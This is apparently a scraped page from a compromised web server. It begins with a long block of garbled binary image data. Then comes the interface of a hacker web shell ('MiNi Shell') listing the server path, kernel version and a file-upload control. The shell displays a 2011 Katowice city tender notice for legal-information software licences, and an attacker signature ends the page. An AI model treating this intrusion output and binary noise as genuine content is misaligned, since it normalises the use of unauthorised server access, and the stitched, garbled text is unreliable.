JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20111109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20111109/292813-N-2011.html

<p class="kh_header"><b>Katowice: Dostawa  elektronicznych  systemów  informacji prawnej  
Część I -  Dostawa i uruchomienie  systemu   dla pracowników U.M. Katowice wraz z aktualizacją przez 12 miesięcy. 
Część II -  Dostawa i uruchomienie  systemu  dla Wydziału Prawnego U.M Katowice wraz  z aktualizacją przez  12 miesięcy  oraz dostawa  aktualizowanego  w okresie  12 miesięcy systemu  w wersji internetowej dla użytkowników  mobilnych. 
Część III - Dostawa i uruchomienie systemu dla służb finansowych U.M. Katowice  wraz z aktualizacją przez 12 miesięcy.</b><br>
<b>Numer ogłoszenia: 292813 - 2011; data zamieszczenia: 09.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Katowice , ul. Młyńska 4, 40-098 Katowice, woj. śląskie, tel. 32 2593302, faks 32 2593303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  elektronicznych  systemów  informacji prawnej  
Część I -  Dostawa i uruchomienie  systemu   dla pracowników U.M. Katowice wraz z aktualizacją przez 12 miesięcy. 
Część II -  Dostawa i uruchomienie  systemu  dla Wydziału Prawnego U.M Katowice wraz  z aktualizacją przez  12 miesięcy  oraz dostawa  aktualizowanego  w okresie  12 miesięcy systemu  w wersji internetowej dla użytkowników  mobilnych. 
Część III - Dostawa i uruchomienie systemu dla służb finansowych U.M. Katowice  wraz z aktualizacją przez 12 miesięcy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> a) Część pierwsza zamówienia 

Dostawa i uruchomienie  systemu  informacji prawnej dla pracowników Urzędu Miasta Katowice wraz z aktualizacją przez okres 12 miesięcy.  

W tym : 
Dostawa  50 licencji wielostanowiskowych (wersja sieciowa),
Dostawa 1 licencji jednostanowiskowej (dla osób korzystających z laptopu).

wraz z ich   uruchomieniem oraz  aktualizacją przez okres 12 miesięcy. 
W ramach zamówienia wykonawca będzie zobowiązany do przeszkolenia  100 pracowników 

b) Część druga zamówienia    

Dostawa i uruchomienie  systemu informacji prawnej dla Wydziału Prawnego Urzędu Miasta Katowice wraz z aktualizacją przez okres 12 miesięcy  oraz dostawa aktualizowanego  w okresie   12 miesięcy  systemu informacji prawnej w wersji internetowej dla użytkowników  mobilnych. 

W tym: 
dostawa 9  licencji wielostanowiskowych (wersja sieciowa) wraz z ich   uruchomieniem oraz  aktualizacją przez okres 12 miesięcy. 
dostawa 2 licencji systemu  informacji prawnej w wersji internetowej (licencje mobilne).

c) Trzecia część zamówienia 

Dostawa i uruchomienie systemu informacji prawnej dla  służb finansowych Urzędu Miasta Katowice  wraz z aktualizacją przez okres 12 miesięcy tj.: 
dostawa  5 licencji wielostanowiskowych wraz z ich uruchomieniem oraz  aktualizacją przez okres 12 miesięcy. 
W ramach zamówienia wykonawca będzie zobowiązany do przeszkolenia  10 pracowników 

3)	W ramach każdej z części zamówienia  wykonawca zobowiązany jest do załączenia do oferty kompletu nośników umożliwiających uruchomienie w pełni funkcjonalnej wersji jednostanowiskowej oferowanego przez wykonawcę oprogramowania
4)	Zamawiający oświadcza, że załączony do oferty nośnik (nośniki) będą używany/ne jedynie w celu wyboru oferty najkorzystniejszej każdej z części  przedmiotowego postępowania. 
5)	Dostarczona  do oferty wersja oprogramowana winna działać nie krócej niż przez okres 30 dni od daty jej zainstalowania. W przypadku konieczności przedłużenia związania ofertą wykonawca jest zobowiązany do dostarczenia dodatkowej licencji ważnej do końca związania ofertą

6)	Zamawiający informuje, ze Wydział Prawny będzie miał zainstalowane dwa systemy . Do systemu opisanego w części pierwszej będą mieli dostęp wszyscy pracownicy Urzędu Miasta Katowice. Natomiast system opisany w części  drugiej będzie dodatkowym systemem do którego będą mieli dostęp pracownicy Wydziału  Prawnego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 48.70.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie, ponieważ przepisy prawa nie nakładają obowiązku posiadania uprawnień do wykonywania usług będących przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Posiadania wiedzy i doświadczenia; tj w okresie ostatnich trzech lat przed upływem terminu składania ofert  a jeżeli okres prowadzenia  działalności jest krótszy, w tym okresie  wykonali a w przypadku świadczeń okresowych lub ciągłych wykonują (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) : 
dla części  I  -  min jedną dostawę  systemu informacji prawnej wraz z aktualizacją przez okres minimum 12 miesięcy 
dla części II -  min jedną dostawę systemu informacji prawnej wraz z aktualizacją przez okres minimum 12 miesięcy 
dla części  III  min dwie dostawy  systemu informacji prawnej wraz z aktualizacją przez okres minimum 12 miesięcy dla  jednostek samorządu terytorialnego o budżecie porównywalnym do miasta Katowice, tj. co najmniej 1.000.000.000 PLN.
W przypadku gdy wykonawca złoży ofertę na  dwie części zamówienia (tj. na część I i III lub część II i III)  wystarczającym udokumentowaniem posiadanego doświadczenia będzie spełnienie warunku jak dla części III zamówienia
2.Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie wymienionych w części IV niniejszej  specyfikacji dokumentów i oświadczeń złożonych przez wykonawcę wraz z ofertą. Oświadczenia i dokumenty będą oceniane pod względem formalno-prawnym, pod względem ich aktualności i treści, a także, czy informacje w nich zawarte potwierdzają spełnienie wymagań zamawiającego. Sposób oceny spełniania warunków wymaganych od wykonawców będzie dokonywany na podstawie przedłożonych w ofercie dokumentów wymienionych w pkt 15 części IV oraz będzie zgodny z formułą  SPEŁNIA/ NIE SPEŁNIA.
3.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi  stosunków. Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności,  przedstawiając w tym celu pisemne zobowiązanie podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) W przypadku określonym w punkcie 14 części III siwz - pisemne zobowiązanie tych podmiotów, że oddane zostaną do dyspozycji Wykonawcy niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia 
2) w ramach każdej z części zamówienia  wykonawca zobowiązany załączyć do oferty:
a)komplet nośników umożliwiających uruchomienie w pełni funkcjonalnej wersji jednostanowiskowej oferowanego przez wykonawcę oprogramowania.
b)opis funkcjonalny systemu z określeniem minimalnych wymagań systemowych dla serwera i stacji roboczych oraz z wyszczególnieniem modułów, jakie wchodzą w skład systemu z opisem podstawowych funkcjonalności tych modułów</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oferta na formularzu oferty o treści zgodnej z określoną we wzorze stanowiącym załącznik do SIWZ wraz z oświadczeniem o spełnianiu warunków udziału w postępowaniu.
1) W przypadku gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia (np. spółki cywilne, konsorcja) - wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Fakt ustanowienia pełnomocnika należy udokumentować dołączeniem pełnomocnictwa podpisanego przez wszystkich wykonawców wspólnie ubiegających się o zamówienie. Pełnomocnictwo winno być w formie oryginału lub notarialnie poświadczonej kopii. 

2) Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy

3)	W celu wykazania braku  podstaw do wykluczenia  takiego wykonawcy z  postępowania  dokumenty wymienione w  części IV punkt 15 ppkt 4 a- b  należy przedstawić  j.n.:   
a)	spółki cywilne - dla każdego ze wspólników spółki osobno,  
b)	konsorcja - dla każdego z partnerów konsorcjum osobno;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy może nastąpić wyłącznie na warunkach  określonych poniżej:
a)Zamawiający z ważnych przyczyn nie dających się przewidzieć w chwili zawarcia umowy, wstrzyma wykonanie prac;
b) nastąpi zmiana obowiązującej stawki VAT;
c) zmiana terminu wykonania umowy jeżeli niedochowanie tego terminu jest następstwem działania siły wyższej zaistniały przyczyny niezależne od działania stron, których przy zachowaniu wszelkich należytych środków nie można uniknąć ani im zapobiec. 
2)Zmiana umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie, pod rygorem  nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta  Wydział Informatyki, Katowice ul. Młyńska 4 pokój 316, tel. 032 2593 243.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.11.2011 godzina 10:00, miejsce: Urząd Miasta  Wydział Informatyki, Katowice ul. Młyńskiej 4,  pokój 315..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1)	Przedmiot zamówienia należy wykonać : w  terminie do 31.12.2012 r 
z tym zastrzeżeniem, że

a)	w zakresie dostawy instalowania i uruchomienia systemu  winien zostać wykonany w terminie 7  dni od dnia podpisania umowy.   
b)	w zakresie  aktualizacji bazy danych winien zostać wykonany co 14 dni w okresie 12 miesięcy    od podpisania protokołu odbioru zakresu jak w punkcie 10.1a . 
c)	aktualizacja bazy danych nie może  nastąpić wcześniej  niż od   dnia 1.01.2012r. 
d)	szkolenie pracowników w zakresie obsługi systemu winno być przeprowadzone w terminie jednego miesiąca od podpisania protokołu odbioru zakresu jak w punkcie 10.1a ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa i uruchomienie  systemu  informacji prawnej dla pracowników Urzędu Miasta Katowice wraz z aktualizacją przez okres 12 miesięcy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i uruchomienie  systemu  informacji prawnej dla pracowników Urzędu Miasta Katowice wraz z aktualizacją przez okres 12 miesięcy.  

W tym : 
Dostawa  50 licencji wielostanowiskowych (wersja sieciowa),
Dostawa 1 licencji jednostanowiskowej (dla osób korzystających z laptopu).

wraz z ich   uruchomieniem oraz  aktualizacją przez okres 12 miesięcy. 
W ramach zamówienia wykonawca będzie zobowiązany do przeszkolenia  100 pracowników.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.70.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Ilość orzeczeń - 10</li>
<li>3. Ilość piśmiennictwa - 10</li>
<li>4. Wartość merytoryczna komentarzy - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa i uruchomienie  systemu informacji prawnej dla Wydziału Prawnego Urzędu Miasta Katowice wraz z aktualizacją przez okres 12 miesięcy  oraz dostawa aktualizowanego  w okresie   12 miesięcy  systemu informacji prawnej w wersji internetowej dla użytkowników  mobilnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i uruchomienie  systemu informacji prawnej dla Wydziału Prawnego Urzędu Miasta Katowice wraz z aktualizacją przez okres 12 miesięcy  oraz dostawa aktualizowanego  w okresie   12 miesięcy  systemu informacji prawnej w wersji internetowej dla użytkowników  mobilnych. 

W tym: 
dostawa 9  licencji wielostanowiskowych (wersja sieciowa) wraz z ich   uruchomieniem oraz  aktualizacją przez okres 12 miesięcy. 
dostawa 2 licencji systemu  informacji prawnej w wersji internetowej (licencje mobilne)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.70.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Ilość orzecnistwa - 10</li>
<li>3. Ilość piśmiennictwa - 10</li>
<li>4. Wartość merytoryczna komentarzy - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa i uruchomienie systemu informacji prawnej dla  służb finansowych Urzędu Miasta Katowice  wraz z aktualizacją przez okres 12 miesięcy tj.:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i uruchomienie systemu informacji prawnej dla  służb finansowych Urzędu Miasta Katowice  wraz z aktualizacją przez okres 12 miesięcy tj.: 
dostawa  5 licencji wielostanowiskowych wraz z ich uruchomieniem oraz  aktualizacją przez okres 12 miesięcy. 
W ramach zamówienia wykonawca będzie zobowiązany do przeszkolenia  10 pracowników.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.70.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com